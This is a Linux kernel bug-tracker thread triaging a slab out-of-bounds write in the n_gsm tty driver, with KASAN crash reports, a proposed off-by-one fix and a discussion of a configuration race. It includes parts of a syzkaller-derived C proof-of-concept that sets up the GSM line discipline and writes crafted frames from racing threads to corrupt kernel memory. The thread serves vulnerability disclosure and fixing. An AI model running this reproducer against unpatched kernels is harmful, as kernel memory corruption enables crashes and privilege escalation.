An off-by-one vulnerability occurs in gsm0_receive and gsm1_receive. I'll focus on gsm0_receive for our discussion. [1] : Write the value to gsm->buf, then increment gsm->count by 1. [2] : If gsm->count == gsm->len is reached, stop reading. Writing a value to a buffer and then checking its length is typical of off-by-one vulnerabilities. ```c static void gsm0_receive(struct gsm_mux *gsm, u8 c) { unsigned int len; switch (gsm->state) { ... case GSM_DATA: /* Data */ gsm->buf[gsm->count++] = c;//[1] if (gsm->count == gsm->len) {//[2] /* Calculate final FCS for UI frames over all data */ if ((gsm->control & ~PF) != UIH) { gsm->fcs = gsm_fcs_add_block(gsm->fcs, gsm->buf, gsm->count); } gsm->state = GSM_FCS; } break; case GSM_FCS: /* FCS follows the packet */ gsm->fcs = gsm_fcs_add(gsm->fcs, c); gsm->state = GSM_SSOF; break; case GSM_SSOF: gsm->state = GSM_SEARCH; if (c == GSM0_SOF) gsm_queue(gsm); else gsm->bad_size++; break; default: pr_debug("%s: unhandled state: %d ", __func__, gsm->state); break; } } ``` - `gsm->count == gsm->len` should be changed to `(gsm->count+1) == gsm->len`
BUG: KASAN: slab-out-of-bounds in gsm0_receive+0xa4b/0xaf0 drivers/tty/n_gsm.c:2915 Write of size 1 at addr ffff888018aa45dd by task kworker/u5:0/25 CPU: 0 PID: 25 Comm: kworker/u5:0 Not tainted 6.8.0-rc5-dirty #283 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 Workqueue: events_unbound flush_to_ldisc Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x37/0x50 lib/dump_stack.c:106 print_address_description mm/kasan/report.c:377 [inline] print_report+0xc1/0x5e0 mm/kasan/report.c:488 kasan_report+0xb0/0xe0 mm/kasan/report.c:601 gsm0_receive+0xa4b/0xaf0 drivers/tty/n_gsm.c:2915 gsmld_receive_buf+0x1d8/0x300 drivers/tty/n_gsm.c:3555 tty_ldisc_receive_buf+0x149/0x180 drivers/tty/tty_buffer.c:390 tty_port_default_receive_buf+0x72/0xa0 drivers/tty/tty_port.c:37 receive_buf drivers/tty/tty_buffer.c:444 [inline] flush_to_ldisc+0x221/0x6f0 drivers/tty/tty_buffer.c:494 process_one_work+0x677/0xf80 kernel/workqueue.c:2633 process_scheduled_works kernel/workqueue.c:2706 [inline] worker_thread+0x7ea/0xff0 kernel/workqueue.c:2787 kthread+0x281/0x350 kernel/kthread.c:388 ret_from_fork+0x2c/0x70 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1b/0x30 arch/x86/entry/entry_64.S:242 </TASK> Allocated by task 1020649: kasan_save_stack+0x24/0x50 mm/kasan/common.c:47 kasan_save_track+0x14/0x30 mm/kasan/common.c:68 poison_kmalloc_redzone mm/kasan/common.c:372 [inline] __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:389 kmalloc include/linux/slab.h:590 [inline] gsm_alloc_mux drivers/tty/n_gsm.c:3220 [inline] gsmld_open+0x109/0xd30 drivers/tty/n_gsm.c:3634 tty_ldisc_open+0x9f/0x120 drivers/tty/tty_ldisc.c:432 tty_set_ldisc+0x2e7/0x680 drivers/tty/tty_ldisc.c:557 tiocsetd drivers/tty/tty_io.c:2439 [inline] tty_ioctl+0x5c0/0x1590 drivers/tty/tty_io.c:2739 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:871 [inline] __se_sys_ioctl fs/ioctl.c:857 [inline] __x64_sys_ioctl+0x12d/0x1a0 fs/ioctl.c:857 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xc0/0x250 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x6f/0x77 The buggy address belongs to the object at ffff888018aa4000 which belongs to the cache kmalloc-2k of size 2048 The buggy address is located 0 bytes to the right of allocated 1501-byte region [ffff888018aa4000, ffff888018aa45dd) The buggy address belongs to the physical page: page:ffffea000062a800 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x18aa0 head:ffffea000062a800 order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0 flags: 0xfff00000000840(slab|head|node=0|zone=1|lastcpupid=0x7ff) page_type: 0xffffffff() raw: 00fff00000000840 ffff888010c42000 dead000000000100 dead000000000122 raw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected page_owner tracks the page as allocated page last allocated via order 3, migratetype Unmovable, gfp_mask 0xd20c0(__GFP_IO|__GFP_FS|__GFP_NOWARN|__GFP_NORETRY|__GFP_COMP|__GFP_NOMEMALLOC), pid 1, tgid 1 (swapper/0), ts 3810864554, free_ts 3810057898 set_page_owner include/linux/page_owner.h:31 [inline] post_alloc_hook+0x2dd/0x350 mm/page_alloc.c:1533 prep_new_page mm/page_alloc.c:1540 [inline] get_page_from_freelist+0xd0a/0x3570 mm/page_alloc.c:3311 __alloc_pages+0x21f/0x1f30 mm/page_alloc.c:4567 __alloc_pages_node include/linux/gfp.h:238 [inline] alloc_pages_node include/linux/gfp.h:261 [inline] alloc_slab_page mm/slub.c:2190 [inline] allocate_slab mm/slub.c:2354 [inline] new_slab+0xd3/0x3b0 mm/slub.c:2407 ___slab_alloc+0x679/0xba0 mm/slub.c:3540 __slab_alloc mm/slub.c:3625 [inline] __slab_alloc_node mm/slub.c:3678 [inline] slab_alloc_node mm/slub.c:3850 [inline] kmalloc_trace+0x35c/0x3a0 mm/slub.c:4007 kmalloc include/linux/slab.h:590 [inline] kzalloc include/linux/slab.h:711 [inline] cec_allocate_adapter+0x78/0x600 drivers/media/cec/core/cec-core.c:268 vivid_cec_alloc_adap+0xcb/0x130 drivers/media/test-drivers/vivid/vivid-cec.c:323 vivid_create_instance drivers/media/test-drivers/vivid/vivid-core.c:1926 [inline] vivid_probe drivers/media/test-drivers/vivid/vivid-core.c:2018 [inline] vivid_probe+0x45a9/0x8e70 drivers/media/test-drivers/vivid/vivid-core.c:2003 platform_probe+0xd2/0x190 drivers/base/platform.c:1404 call_driver_probe drivers/base/dd.c:579 [inline] really_probe+0x1cd/0xb30 drivers/base/dd.c:658 __driver_probe_device+0x184/0x450 drivers/base/dd.c:800 driver_probe_device+0x44/0x120 drivers/base/dd.c:830 __driver_attach+0x1db/0x4a0 drivers/base/dd.c:1216 bus_for_each_dev+0xec/0x170 drivers/base/bus.c:368 bus_add_driver+0x299/0x570 drivers/base/bus.c:673 page last free pid 1 tgid 1 stack trace: create_dummy_stack mm/page_owner.c:69 [inline] register_dummy_stack+0x61/0xb0 mm/page_owner.c:75 init_page_owner+0x25/0x950 mm/page_owner.c:93 invoke_init_callbacks mm/page_ext.c:135 [inline] page_ext_init+0x51a/0x740 mm/page_ext.c:480 mm_core_init+0x4e5/0x5e0 mm/mm_init.c:2788
On Thu, Apr 11, 2024 at 01:56:38AM +0000, bugzilla-daemon@kernel.org wrote: > An off-by-one vulnerability occurs in gsm0_receive and gsm1_receive. I'll > focus > on gsm0_receive for our discussion. Can you send a patch to the linux-serial@vger.kernel.org list to help resolve this issue?
Case gsm0_receive: - gsm->len is built from the first and maybe also second length octet - gsm->len is checked against gsm->mru (gsm->buf is allocated with mru + 1) - gsm->count is reset to zero - all conscious octets are added to the buffer, each increasing the next write position via gsm->count - this finishes if gsm->count equals to gsm->len Simple example using numbers: - gsm->len = 2 - gsm->count = 0 - gsm->buf[0] = data - gsm->count++ // 1 - gsm->buf[1] = data - gsm->count++ // 2 - gsm->count == gsm->len == 2 -> end of data This is more or less the same like: for (int i = 0; i < len; i++) { buf[i] = data; } Hence, no issue. There can be no off-by-one visible to KASAN even if gsm->count hits one past gsm->mru as gsm->buf was allocated with gsm->mru + 1. Actually, performing the suggested change will discard the last valid data octet in each frame. Case gsm1_receive: - gsm->count is reset to zero after reaching the control field of a frame - all conscious octets are added to the buffer, each increasing the next write position via gsm->count - this finishes if gsm->count gets one larger than gsm->mru or SOF was found (gsm->buf is allocated with mru + 1) - the last octet is taken as fcs if SOF was found beforehand and the gsm->count gets decreased accordingly For me this looks like another place corrupted our data.
(In reply to j51569436 from comment #1) > BUG: KASAN: slab-out-of-bounds in gsm0_receive+0xa4b/0xaf0 > drivers/tty/n_gsm.c:2915 > Write of size 1 at addr ffff888018aa45dd by task kworker/u5:0/25 ... > invoke_init_callbacks mm/page_ext.c:135 [inline] > page_ext_init+0x51a/0x740 mm/page_ext.c:480 > mm_core_init+0x4e5/0x5e0 mm/mm_init.c:2788 Isn't there "Memory state around the buggy address:" part which you stripped away?
I apologize for my mistake. I have a different suggestion. In GSM_LEN1, check if gsm->len is greater than gsm->mru. But don't subtract gsm->len which is already added, this seems to be the real cause. ``` case GSM_LEN1: gsm->fcs = gsm_fcs_add(gsm->fcs, c); len = c; gsm->len |= len << 7; if (gsm->len > gsm->mru) { gsm->bad_size++; gsm->state = GSM_SEARCH; break; } gsm->count = 0; if (!gsm->len) gsm->state = GSM_FCS; else gsm->state = GSM_DATA; break; ```
Oh, sorry. Please ignore the issue with GSM_LEN1 that I just mentioned. I'll analyze it again and share my findings.
if (c->mru > MAX_MRU || c->mtu > MAX_MTU) return -EINVAL; c->mru is never constraint-checked AFAICS.
Below is the full report from syzkaller. ================================================================== BUG: KASAN: slab-out-of-bounds in gsm0_receive+0xa4b/0xaf0 drivers/tty/n_gsm.c:2915 Write of size 1 at addr ffff888018aa45dd by task kworker/u5:0/25 CPU: 0 PID: 25 Comm: kworker/u5:0 Not tainted 6.8.0-rc5-dirty #283 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 Workqueue: events_unbound flush_to_ldisc Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x37/0x50 lib/dump_stack.c:106 print_address_description mm/kasan/report.c:377 [inline] print_report+0xc1/0x5e0 mm/kasan/report.c:488 kasan_report+0xb0/0xe0 mm/kasan/report.c:601 gsm0_receive+0xa4b/0xaf0 drivers/tty/n_gsm.c:2915 gsmld_receive_buf+0x1d8/0x300 drivers/tty/n_gsm.c:3555 tty_ldisc_receive_buf+0x149/0x180 drivers/tty/tty_buffer.c:390 tty_port_default_receive_buf+0x72/0xa0 drivers/tty/tty_port.c:37 receive_buf drivers/tty/tty_buffer.c:444 [inline] flush_to_ldisc+0x221/0x6f0 drivers/tty/tty_buffer.c:494 process_one_work+0x677/0xf80 kernel/workqueue.c:2633 process_scheduled_works kernel/workqueue.c:2706 [inline] worker_thread+0x7ea/0xff0 kernel/workqueue.c:2787 kthread+0x281/0x350 kernel/kthread.c:388 ret_from_fork+0x2c/0x70 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1b/0x30 arch/x86/entry/entry_64.S:242 </TASK> Allocated by task 1020649: kasan_save_stack+0x24/0x50 mm/kasan/common.c:47 kasan_save_track+0x14/0x30 mm/kasan/common.c:68 poison_kmalloc_redzone mm/kasan/common.c:372 [inline] __kasan_kmalloc+0xaa/0xb0 mm/kasan/common.c:389 kmalloc include/linux/slab.h:590 [inline] gsm_alloc_mux drivers/tty/n_gsm.c:3220 [inline] gsmld_open+0x109/0xd30 drivers/tty/n_gsm.c:3634 tty_ldisc_open+0x9f/0x120 drivers/tty/tty_ldisc.c:432 tty_set_ldisc+0x2e7/0x680 drivers/tty/tty_ldisc.c:557 tiocsetd drivers/tty/tty_io.c:2439 [inline] tty_ioctl+0x5c0/0x1590 drivers/tty/tty_io.c:2739 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:871 [inline] __se_sys_ioctl fs/ioctl.c:857 [inline] __x64_sys_ioctl+0x12d/0x1a0 fs/ioctl.c:857 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xc0/0x250 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x6f/0x77 The buggy address belongs to the object at ffff888018aa4000 which belongs to the cache kmalloc-2k of size 2048 The buggy address is located 0 bytes to the right of allocated 1501-byte region [ffff888018aa4000, ffff888018aa45dd) The buggy address belongs to the physical page: page:ffffea000062a800 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x18aa0 head:ffffea000062a800 order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0 flags: 0xfff00000000840(slab|head|node=0|zone=1|lastcpupid=0x7ff) page_type: 0xffffffff() raw: 00fff00000000840 ffff888010c42000 dead000000000100 dead000000000122 raw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected page_owner tracks the page as allocated page last allocated via order 3, migratetype Unmovable, gfp_mask 0xd20c0(__GFP_IO|__GFP_FS|__GFP_NOWARN|__GFP_NORETRY|__GFP_COMP|__GFP_NOMEMALLOC), pid 1, tgid 1 (swapper/0), ts 3810864554, free_ts 3810057898 set_page_owner include/linux/page_owner.h:31 [inline] post_alloc_hook+0x2dd/0x350 mm/page_alloc.c:1533 prep_new_page mm/page_alloc.c:1540 [inline] get_page_from_freelist+0xd0a/0x3570 mm/page_alloc.c:3311 __alloc_pages+0x21f/0x1f30 mm/page_alloc.c:4567 __alloc_pages_node include/linux/gfp.h:238 [inline] alloc_pages_node include/linux/gfp.h:261 [inline] alloc_slab_page mm/slub.c:2190 [inline] allocate_slab mm/slub.c:2354 [inline] new_slab+0xd3/0x3b0 mm/slub.c:2407 ___slab_alloc+0x679/0xba0 mm/slub.c:3540 __slab_alloc mm/slub.c:3625 [inline] __slab_alloc_node mm/slub.c:3678 [inline] slab_alloc_node mm/slub.c:3850 [inline] kmalloc_trace+0x35c/0x3a0 mm/slub.c:4007 kmalloc include/linux/slab.h:590 [inline] kzalloc include/linux/slab.h:711 [inline] cec_allocate_adapter+0x78/0x600 drivers/media/cec/core/cec-core.c:268 vivid_cec_alloc_adap+0xcb/0x130 drivers/media/test-drivers/vivid/vivid-cec.c:323 vivid_create_instance drivers/media/test-drivers/vivid/vivid-core.c:1926 [inline] vivid_probe drivers/media/test-drivers/vivid/vivid-core.c:2018 [inline] vivid_probe+0x45a9/0x8e70 drivers/media/test-drivers/vivid/vivid-core.c:2003 platform_probe+0xd2/0x190 drivers/base/platform.c:1404 call_driver_probe drivers/base/dd.c:579 [inline] really_probe+0x1cd/0xb30 drivers/base/dd.c:658 __driver_probe_device+0x184/0x450 drivers/base/dd.c:800 driver_probe_device+0x44/0x120 drivers/base/dd.c:830 __driver_attach+0x1db/0x4a0 drivers/base/dd.c:1216 bus_for_each_dev+0xec/0x170 drivers/base/bus.c:368 bus_add_driver+0x299/0x570 drivers/base/bus.c:673 page last free pid 1 tgid 1 stack trace: create_dummy_stack mm/page_owner.c:69 [inline] register_dummy_stack+0x61/0xb0 mm/page_owner.c:75 init_page_owner+0x25/0x950 mm/page_owner.c:93 invoke_init_callbacks mm/page_ext.c:135 [inline] page_ext_init+0x51a/0x740 mm/page_ext.c:480 mm_core_init+0x4e5/0x5e0 mm/mm_init.c:2788 Memory state around the buggy address: ffff888018aa4480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ffff888018aa4500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >ffff888018aa4580: 00 00 00 00 00 00 00 00 00 00 00 05 fc fc fc fc ^ ffff888018aa4600: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffff888018aa4680: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ==================================================================
(In reply to Jiri Slaby from comment #7) > if (c->mru > MAX_MRU || c->mtu > MAX_MTU) > return -EINVAL; > > c->mru is never constraint-checked AFAICS. Scratch that, it's on another line and I misread, hopefully ;): if (c->mru < MIN_MTU || c->mtu < MIN_MTU) return -EINVAL; if (c->mru > MAX_MRU || c->mtu > MAX_MTU) I somehow expected mtu to be checked on one line and mru on the other...
(In reply to j51569436 from comment #8) > Below is the full report from syzkaller. BTW can you let syzkaller create a reproducer for this? I don't remember the details, it was like running syz-repro somehow.
We could harden n_gsm against memory corruption for example by changing if (gsm->count == gsm->len) { to if (gsm->count >= gsm->len) { But this does not change the fact that our gsm->count field got corrupted. P.S.: We would see data integrity issues all over the place if there was a logical issue with the frame data length handling.
Note that corruption of the gsm->mru or gsm->len field is also possible.
(In reply to Jiri Slaby from comment #10) > (In reply to j51569436 from comment #8) > > Below is the full report from syzkaller. > > BTW can you let syzkaller create a reproducer for this? I don't remember the > details, it was like running syz-repro somehow. Precisely: ./syz-repro -config <my.cfg> <crash-qemu-1-1455745459265726910> where <my.cfg> is your config and <crash-qemu-1-1455745459265726910> is the crash id you should see on the web status page or in the log.
(In reply to Daniel Starke from comment #11) > We could harden n_gsm against memory corruption for example by changing > if (gsm->count == gsm->len) { > to > if (gsm->count >= gsm->len) { (In reply to Daniel Starke from comment #12) > Note that corruption of the gsm->mru or gsm->len field is also possible. This would help to track this down: if (gsm->count > MAX_MRU) pr_info("%s: %u %u %u\n", __func__, gsm->count, gsm->mru, gsm->len); How often syzkaller hits this? Can you add this to "case GSM_DATA"? If we had a repro, it would be super easy to debug.
(In reply to Daniel Starke from comment #12) > Note that corruption of the gsm->mru or gsm->len field is also possible. I couldn't find the issue in the code too. Provided the path comes from an asynchronous work: > receive_buf drivers/tty/tty_buffer.c:444 [inline] > flush_to_ldisc+0x221/0x6f0 drivers/tty/tty_buffer.c:494 another option is a race between cleanup_mux and flush_to_lidsc. Could gsm1_receive have switched to gsm0_receive by gsm_config() in the meantime?
(In reply to Jiri Slaby from comment #15) > another option is a race between cleanup_mux and flush_to_lidsc. Could > gsm1_receive have switched to gsm0_receive by gsm_config() in the meantime? A race condition looks possible here. I recommend resetting gsm->state to GSM_SEARCH each time gsm->receive is changed. Maybe we also need to guard against parallel execution of gsm->receive and its change?
syzkaller succeeds in reproducing the crash, but fails to compile the final output because of the functions I put in as customizations. I am manually creating compilable POC code from the intermediate output provided by syzkaller. I will share the important parts of the intermediate result code with you guys. unsigned long syz_ext_open_gsm() { char* pts; long master_fd; int slave_fd; int arg; master_fd = open("/dev/ptmx", O_RDWR | O_CLOEXEC); grantpt(master_fd); unlockpt(master_fd); pts = ptsname(master_fd); printf("ptsname %s\n", pts); slave_fd = open(pts, O_RDWR | O_CLOEXEC); arg = N_GSM0710; ioctl(slave_fd, TIOCSETD, &arg); return (master_fd << 32) | slave_fd; } int syz_ext_write_master(long fd, char* buffer, size_t len) { fd = fd >> 32; return write(fd, buffer, len); } uint64_t r[1] = {0x0}; void execute_call(int call) { intptr_t res = 0; switch (call) { case 0: res = -1; NONFAILING(res = syz_ext_open_gsm()); if (res != -1) r[0] = res; break; case 1: NONFAILING(*(uint32_t*)0x20000140 = 1); NONFAILING(*(uint32_t*)0x20000144 = 0); NONFAILING(*(uint32_t*)0x20000148 = 0); NONFAILING(*(uint32_t*)0x2000014c = 0); NONFAILING(*(uint32_t*)0x20000150 = 0); NONFAILING(*(uint32_t*)0x20000154 = 0); NONFAILING(*(uint32_t*)0x20000158 = 0); NONFAILING(*(uint32_t*)0x2000015c = 0x3df); NONFAILING(*(uint32_t*)0x20000160 = 0xa4); NONFAILING(*(uint32_t*)0x20000164 = 6); NONFAILING(*(uint32_t*)0x20000168 = 2); NONFAILING(memset((void*)0x2000016c, 0, 32)); syscall(__NR_ioctl, /*fd=*/r[0], /*cmd=*/0x404c4701, /*arg=*/0x20000140ul); break; case 2: NONFAILING(memcpy((void*)0x20000080, "\xfc\xbf\xa4\x11\x35\x47\xd6\xe8\x99\x85\x52\xab\xe3\x09\x8a\xf1\xa8\xa6\x57\x90\x66\xad\x62\xa4\x8d\xb7\x33\x6a\x12\xdd\xf7\x88\xbb\xbe\xd5\xce\xcc\x27\xba\x75\x93\x62\xab\x5c\xf4\x78\x98\x7e\x26\x21\x62\x88\xff\xe5\xab", 55)); NONFAILING(syz_ext_write_master(/*fd=*/r[0], /*data=*/0x20000080, /*len=*/0x37)); { int i; for(i = 0; i < 32; i++) { NONFAILING(syz_ext_write_master(/*fd=*/r[0], /*data=*/0x20000080, /*len=*/0x37)); } } break; } }
static void* thr(void* arg) { struct thread_t* th = (struct thread_t*)arg; for (;;) { event_wait(&th->ready); event_reset(&th->ready); execute_call(th->call); __atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED); event_set(&th->done); } return 0; } static void execute_one(void) { if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } int i, call, thread; for (call = 0; call < 3; call++) { for (thread = 0; thread < (int)(sizeof(threads) / sizeof(threads[0])); thread++) { struct thread_t* th = &threads[thread]; if (!th->created) { th->created = 1; event_init(&th->ready); event_init(&th->done); event_set(&th->done); thread_start(thr, th); } if (!event_isset(&th->done)) continue; event_reset(&th->done); th->call = call; __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED); event_set(&th->ready); if (call == 1) break; event_timedwait(&th->done, 50); break; } } for (i = 0; i < 100 && __atomic_load_n(&running, __ATOMIC_RELAXED); i++) sleep_ms(1); close_fds(); }
I understand that it's hard for you to analyze this, so just take it as a guide.
(In reply to j51569436 from comment #17) > case 1: > NONFAILING(*(uint32_t*)0x20000140 = 1); > NONFAILING(*(uint32_t*)0x20000144 = 0); > NONFAILING(*(uint32_t*)0x20000148 = 0); > NONFAILING(*(uint32_t*)0x2000014c = 0); > NONFAILING(*(uint32_t*)0x20000150 = 0); > NONFAILING(*(uint32_t*)0x20000154 = 0); > NONFAILING(*(uint32_t*)0x20000158 = 0); > NONFAILING(*(uint32_t*)0x2000015c = 0x3df); > NONFAILING(*(uint32_t*)0x20000160 = 0xa4); > NONFAILING(*(uint32_t*)0x20000164 = 6); > NONFAILING(*(uint32_t*)0x20000168 = 2); > NONFAILING(memset((void*)0x2000016c, 0, 32)); > syscall(__NR_ioctl, /*fd=*/r[0], /*cmd=*/0x404c4701, > /*arg=*/0x20000140ul); GSMIOC_SETCONF with the above struct gsm_config fields set. > break; > case 2: > NONFAILING(memcpy((void*)0x20000080, > "\xfc\xbf\xa4\x11\x35\x47\xd6\xe8\x99\x85\x52\xab\xe3\x09\x8a\xf1\xa8\xa6\x57 > \x90\x66\xad\x62\xa4\x8d\xb7\x33\x6a\x12\xdd\xf7\x88\xbb\xbe\xd5\xce\xcc\x27\ > xba\x75\x93\x62\xab\x5c\xf4\x78\x98\x7e\x26\x21\x62\x88\xff\xe5\xab", 55)); Simple write, so this ends up in receive. > NONFAILING(syz_ext_write_master(/*fd=*/r[0], > /*data=*/0x20000080, /*len=*/0x37)); } So GSMIOC_SETCONF racing with write?
Created attachment 306136 [details] poc.c for crash
POC.C that is causing the crash. It has a lot of unnecessary parts, but it shouldn't be hard to recognize the parts that crash.
(In reply to Jiri Slaby from comment #20) > (In reply to j51569436 from comment #17) > > case 1: > > NONFAILING(*(uint32_t*)0x20000140 = 1); > > NONFAILING(*(uint32_t*)0x20000144 = 0); encapsulation = 0. So no change of ->receive. > > NONFAILING(*(uint32_t*)0x20000148 = 0); > > NONFAILING(*(uint32_t*)0x2000014c = 0); > > NONFAILING(*(uint32_t*)0x20000150 = 0); > > NONFAILING(*(uint32_t*)0x20000154 = 0); > > NONFAILING(*(uint32_t*)0x20000158 = 0); > > NONFAILING(*(uint32_t*)0x2000015c = 0x3df); mru = 991, so is increased. I still fail to see how count won't meet with len at some point when mru is only increased. Leaving up to Daniel to debug :). It should be much easier with poc -- thanks j51569436!
What is the .config for the tested kernel? I am unable to run poc.c on my test system due to missing features of the kernel: write to /sys/kernel/debug/x86/nmi_longest_ns failed: No such file or directory write to /proc/sys/kernel/hung_task_check_interval_secs failed: No such file or directory write to /proc/sys/net/core/bpf_jit_kallsyms failed: No such file or directory write to /proc/sys/net/core/bpf_jit_harden failed: No such file or directory write to /proc/sys/kernel/softlockup_all_cpu_backtrace failed: No such file or directory [ 14.107467] cgroup: Unknown subsys name 'net' [ 14.137585] cgroup: Unknown subsys name 'rlimit' [ 14.138573] cgroup: Unknown subsys name 'memory'
git commit : b401b621758e46812da61fa58a67c3fd8d91de0d
Created attachment 306140 [details] config of kernel
I had poc.c running for more than 5h on 6.9.0-rc3 (tty-next) with the given .config but I am unable to reproduce the issue. In the meanwhile, I was able to create an application which gives the same error. However, I am unsure if both are caused by the same events. In my case I write data to the input of the n_gsm tty while switching between basic and advanced option mode to force a write past gsm->len and past gsm->buf. If j51569436 is able to reproduce the issue with poc.c, please try to see if it still occurs after changing if (gsm->count == gsm->len) { to if (gsm->count >= gsm->len) { in gsm0_receive(). I will prepare a patch for my case.
I haven't analyzed the exact cause of the vulnerability, so I'm not sure if this is the right patch, but at least with this patch, the crash doesn't happen.
Nice to see a detailed technical analysis of this issue. I was only able to find one of the 3 causes of this crash, and failed to do a complete analysis. - https://github.com/roddux/germy/blob/main/TECHNICAL_DETAILS.md